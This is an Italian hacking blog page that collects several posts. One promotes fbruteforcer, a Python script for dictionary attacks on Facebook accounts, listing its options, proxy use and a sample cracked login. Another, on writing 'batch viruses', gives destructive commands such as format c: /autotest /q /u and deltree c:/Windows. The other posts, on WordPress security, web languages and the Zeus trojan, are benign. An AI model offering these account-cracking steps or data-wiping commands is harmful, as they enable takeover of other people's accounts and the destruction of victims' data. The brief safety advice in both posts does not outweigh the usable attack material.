Ricevi gli aggiornamenti nella tua email:


set
3rd

Craccare Facebook con fbruteforcer

Autore: Angelo Righi | Files under Hacking

Se non si riesce a craccare un account di Facebook sfruttando un bug, attuando qualche trucco di social-engineering o sniffando la passdword in una rete locale, non rimane che un’ultima carta da giocare: la cara vecchia forza bruta.

Dallo stesso autore di wpbruteforcer, script per recuperare la password di un account WordPress tramite dictionary-attack, eccovi oggi un script, sempre scritto in python, per attaccare un account Facebook.

Per i dettagli sull’installazione (anche questo script utilizza il modulo mechanize) vi rimando all’altro articolo.

I parametri obbligatori di questo script sono:

-w utente da attaccare (va bene anche l’indirizzo email)
-w nome del file contenente il dizionario

Inoltre è possibile utilizzare un proxy:

-p specifica l’indirizzo (e la porta) del proxy nel formato indirizzo:porta
-k eventuale nome utente del proxy
-i eventuale password per accedere al proxy

Ecco l’attacco (finto) al mio account, eseguito da Windows. Ho usato un dizionario di quattro parole (in uno scenario reale conviene usarne uno un po’ più corposo…):

C:\PH>fbrutecorcer.py -u angelorighi  -w dictionary.txt
 
Programmer : gunslinger_
Version       : 1.0
 
[*] Starting attack at 23:39:32
[*] Account for bruteforcing angelorighi
[*] Loaded : 4 words
[*] Bruteforcing, please wait...
[*] Trying letmein...

password trovata al terzo tentativo.

[*] Logging in success...
[*] Username : angelorighi
[*] Password : letmein

Tutto facile quindi? Naturalmente no. Se però avete il dubbio che la vostra password possa facilmente essere inserita in un dizionario di parole comuni correte a cambiarla.

Lo script lo potete trovare qui


Leggi anche:


Non Sempre le Cose che Sembrano Complicate Sono Complicate
Come ogni ladro che si rispetti sa, ammesso che un ladro possa essere rispettato, se la porta principale è blindata e inattaccabile, probabilmente la porta di servizio è aperta...

Continua a leggere

Spionaggio 2.0
Nei tempi del collasso finanziario globale e della guerra infinita contro il terrorismo, della società del super-controllo e della inestinguibile Paura, l'MI6 (l'agenzia di controspionaggio...

Continua a leggere

Come Craccare una Rete Wireless in Meno di 60 Secondi
Avete una rete wireless? Utilizzate la criptografia WEP? Siete fritti! Era già noto da tempo che il WEP non era il metodo più sicuro per...

Continua a leggere

ago
31st

Risorse per la Sicurezza di WordPress

Autore: Angelo Righi | Files under Security

WordPress è una applicazione web, e come tutte le applicazioni web è soggetta a pericoli. Questi pericoli possono essere legati a bug dell’engine, bug dei plugin, ad errori di configurazione oppure a problemi di debolezza delle password.

Come ho messo in risalto in un articolo precedente, la password di amministratore, anzi di qualsiasi utente, può essere attaccata tramite dictionary-attack (o brute-force attack). A tal riguardo suggerisco di controllare anche l’articolo “WordPress Brute Force Script” pubblicato su clshack.it.

Per mettere al sicuro il vostro blog WordPress vi suggrisco di dare uno sguardo all’ottimo articolo “Sicurezza di WodrPress: 9 Plugin per Dormire Sonni più Tranquilli”, scritto da Erriko

Su questo post vengono elencati nove plugin molto utili per ridurre le probabilità di trovarsi “bucato” o vandalizzato il proprio blog. Vi raccomando di leggerlo.

Concludo ricordandovi di aggiornare costantemente l’engine e i plugin, di effettuare backup periodici e di scegliere delle password sicure. Soltando seguendo queste semplice regole, il grado di protezione del sito aumenterà in modo considerevole.


Leggi anche:


WordPress Plugin WP-Syntax Vulnerabile Consente l’Esecuzione Remota di Codice
Chi usa Wordpress e il plugin WP-Syntax dovrebbe assicurarsi di utilizzare l'ultima versione (0.9.8). La versione 0.9.1 e precedenti sono vulnerabili e permettono l'esecuzione...

Continua a leggere

Craccare Facebook con fbruteforcer
Se non si riesce a craccare un account di Facebook sfruttando un bug, attuando qualche trucco di social-engineering o sniffando la passdword in una rete locale, non rimane...

Continua a leggere

Contromisure al Cracking degli Hash (e contro-contromisure)
Le funzioni hash sono funzioni in grado di produrre un risultato univoco di lunghezza fissa partendo da un parametro di lunghezza variabile. Inoltre sono irreversibili: dal risultato...

Continua a leggere

ago
27th

Non Solo Php

Autore: Angelo Righi | Files under Programmazione

Qual’è il miglior linguaggio per iniziare a programmare, o per muovere i primi passi nel mondo dello sviluppo web? Potrei rispondere Php, è il linguaggio che uso di più (anche per motivi professionali), quello che mi piace di più. Avrei potuto rispondere .Net, Java, ma non è questo il punto.

Il punto è che non basta conoscere un solo linguaggio server side per poter sviluppare delle applicazioni web al passo coi tempi. Per poter creare qualcosa di utile non basta conoscere un linguaggio di programmazione.

Un’applicazione web è formata da tre elementi: i dati, la rappresentazione dei dati e “qualcosa” che tenga insieme dati e rappresentazione. Per la funzione di “tramite” un linguaggioo come il Php va benissimo; ma i dati dell’applicazione saranno probabilmente memorizzati in un database, sarà quindi necessario conoscere SQL, linguaggio per estrarre i dati dalla base dati.

I dati da soli non servono a nulla se non vengono rappresentati in qualche forma. La forma normalmente viene modellata dalla pagina web in formato HTML. E in genere una pagina web ha anche un aspetto grafico, colori, font, tutte cose descritte nei fogli di stile CSS.

Inoltre un’applicazione moderna è dotata di interfacce abbastanza complesse; non basta più il solo Html ma si rende indispensabile un linguaggio di programmazione lato client: Javascript.

Quindi, la conoscenze minime per poter creare applicazioni web serie, sono Php (o Ruby, o Jsp,Python…), SQL, HTML, CSS e Javascript.

La situazione, che potrebbe già apparire complessa al neofita, si complica maggiormente. Infatti esistono diversi dialetti di SQL. In genere, se ci si limita allo sviluppo web, nel 99% dei casi ci si imbatterà nel database MySql, più raramente in Postgres. Ma nel caso di sviluppo in ambito enterprise la scelta si allarga a Oracle, SQL Server.

Non è finita. Un programmatore web che si rispetti deve conoscere Ajax (Asynchronous Javascript and Xml) per poter sfruttare al meglio l’interazione tra client e server, con lo scambio dati che viene codificato in Xml, o JSON.

Poi eventualmente c’è il framework lato server, questa o quella libreria: e non abbiamo minimamente sfiorato i problemi relativi alla sicurezza.

Quindi, alla domanda dell’apertura, “qual’è il miglior linguaggio per iniziare a programmare, o per muovere i primi passi nel mondo dello sviluppo web?”, non c’è una risposta univoca e semplice.

Quello che conta non è tanto (non solo) conoscere un linguaggio, ma imparare ad imparare, riuscire a crearsi una mentalità flessibile che abbia il fine di apprendere in maniera permanente.


Leggi anche:


11 Risorse Gratuite per Iniziare a Programmare
Iniziare a programmare non è facile, ma può dare grandi soddisfazioni. Qualcuno si fermerà subito; altri si addentreranno nei meandri anche solo per curiosità; infine forse...

Continua a leggere

7 Risorse Imperdibili per Diventare Game Designer
Se qualcuno ha sempre sognato di inventare videogiochi ma non ha mai trovato un punto di partenza dal quale muovere i primi passi, presento sette risorse che potrebbero essere...

Continua a leggere

[eBook] Hacker’s Underground Handbook
Per entrare nel mondo dell'hacking è necessaria una guida. Può essere una persona che ha già esperienza nell'ambiente, un sito, un libro. Gli argomenti da affrontare sono tanti,...

Continua a leggere

ago
21st

Creare Virus in Batch

Autore: Daniele Chiuri | Files under Malware, Programmazione

Con questo articolo vogliamo spiegare come possiamo essere infettati da dei semplici virus che possono essere scritti in linguaggio batch. Specifico che il termine virus in questo articolo sta ad intendere un software malevolo in generale non virus in senso stretto (così semplifichiamo e non ci perdiamo in lungaggini sulla differenza tra virus, worm, spyware ecc.)

Prima di cominciare dobbiamo comunque aggiungere che questi virus non sono molto pericolosi perchè, benchè possano creare danni seri, ormai nelle ultime versioni di windows bisogna avere il consenso dell’amministratore per apportare delle modifiche al file di sistema, quindi lo script malevolo non riuscirebbe ad agire indisturbato o verrebbe comunque bloccato.

Ancora una nota prima di cominciare: dobbiamo spiegare in cosa consistono gli script batch. Questi file (di solito di piccole dimensioni) sono salvati in formato .bat e non sono altro dei comandi che vengono dati al promt di ms-dos. Tutti coloro che hanno una minima conoscenza di dos possono creare questi file. Vediamo alcuni esempi di codice che possono aiutarci a capire meglio come funzionano questi virus. Contate che si creano semplicemente scrivendo il codice sul blocco note e salvandolo come “nome”.bat.

format c: /autotest /q /u

Salvando questo testo sul blocco note in un file .bat avrete creato un virus che formatta l’hard disk senza chiedere nessuna conferma all’utente. La maggioranza degli antivirus trova e annulla questo tipo di file.

start
start
start
start
….

Ognuno di questi comandi apre una finestra del prompt dei comandi di dos…immaginate cosa potrebbe succedere se scriveste 2000/3000 start.

erase /q C:/Windows/nomefile

Questo comando cancellerebbe il file “nomefile” dalla cartella Windows senza chiedere nessuna conferma di cancellazione.

deltree c:/Windows

In questo modo cancellerebbe tutto il contenuto della cartella windows. Bisogna dire in questo caso che questo comando nello specifico (come molti altri) è stato disattivato dalle ultime versioni di windows (per esempio nelle versioni Home di Win 7)

In conclusione dobbiamo aggiungere che questi comandi potrebbero essere combinati e messi uno dopo l’altro per creare più danni.

In questo articolo abbiamo visto solo alcune delle potenzialità dei file batch, ovviamente è una tecnica un po’ datata e con scarse possibilità di successo anche perchè il file deve essere eseguito per funzionare (anche se potrebbe essere messo in autorun) comunque ci ricorda una buona regola della sicurezza informatica: se non sappiamo da chi arriva o cosa contiene un file o una mail NON APRIAMOLO!


Leggi anche:


AVG Antivirus gratuito
State cercando un anti-virus potente che non richiede abbonamenti per poter continuare a usufruire degli aggiornamenti quotidiani? Grisoft AVG è un anti-virus potente e gratuito,...

Continua a leggere

Combatti gli Zero Day con DriveSentry
Chi si occupa di sicurezza o chi legge PillolHacking.Net sa che le vere minacce di Internet sono gli Zero Day. Scenario: avete l'antivirus installato, con gli ultimi aggiornamenti...

Continua a leggere

Cosa sono gli Zero-Day?
Gli zero-day (o 0day) sono tipi di attacchi informatici che sfruttano bug software non ancora noti e per i quali non esistono patch. Quando dico "non ancora noti" intendo dire...

Continua a leggere

ago
18th

Zeus: Rapina Virtuale, Soldi Reali

Autore: Angelo Righi | Files under Malware, News

Spesso si sente parlare di un imminente catastrofico attacco di cyberwarfare diretto verso le infrastrutture critiche, attacco in grado di avere un impatto paragonabile ad un attacco terroristico su vasta scala. Al momento tutto ciò non si è ancora verificato, lasciando lo scenario appena descritto alle trame dei film d’azione.

Una minaccia che invece è diventata reale, ed si presenta sotto forme sempre più sofisticate, è il furto di denaro dai conti bancari tramite trojan e botnet, vere rapine virtuali. In questo caso gli scenari cinematografici sono diventati reali Pensiamo ad esempio al film “Codice Swordfish”, dove un’organizzazione di criminali capeggiata da John Travolta, architetta una rapina in banca sfruttando anche un “worm” realizzato dall’hacker di turno.

Sicuramente il trojan più celebre specializzato  in furti in banca è Zeus. Giunto alla versione v3 si è distinto nel mese di Luglio per un attacco portato contro banche del Regno Unito, riuscendo a trafugare più di cinquecentomila Euro; ma le cifre non sono definitive, essendo il trojan ancora in piena attività.

Un’interessante analisi tecnica è stata realizzata da M86 Security. Il pdf approfondisce tutti gli aspetti del malware, dai metodi di infezione all’analisi dell’unità di comando  e controllo (C&C).

Esiste forse qualcosa di più interessante da leggere sotto l’ombrellone?


Leggi anche:


A Volte Ritornano: Non Solo Botnet
Chi si occupa di sicurezza informatica spesso sente parlare di zombi. Gli zombi sono computer infettati e messi sotto controllo da un pirata o da un'organizzazione di pirati. L'insieme...

Continua a leggere

Sabotaggio Digitale: Attacco alle Infrastrutture Critiche
Non sono stato un buon profeta e la profezia non si è avverata. Le Olimpiadi di Pechino non sono state funestate da attacchi terroristici o cyberterroristici.A dire il vero a...

Continua a leggere

Come Associare una Cartella ad una Lettera di Unità per Accedervi Velocemente.
L'altro giorno mi sono trovato a dover assegnare ad una memoria di massa  un'altra lettera di unità, diversa da quella assegnata dal sistema. Nel mio caso dovevo assegnare ad...

Continua a leggere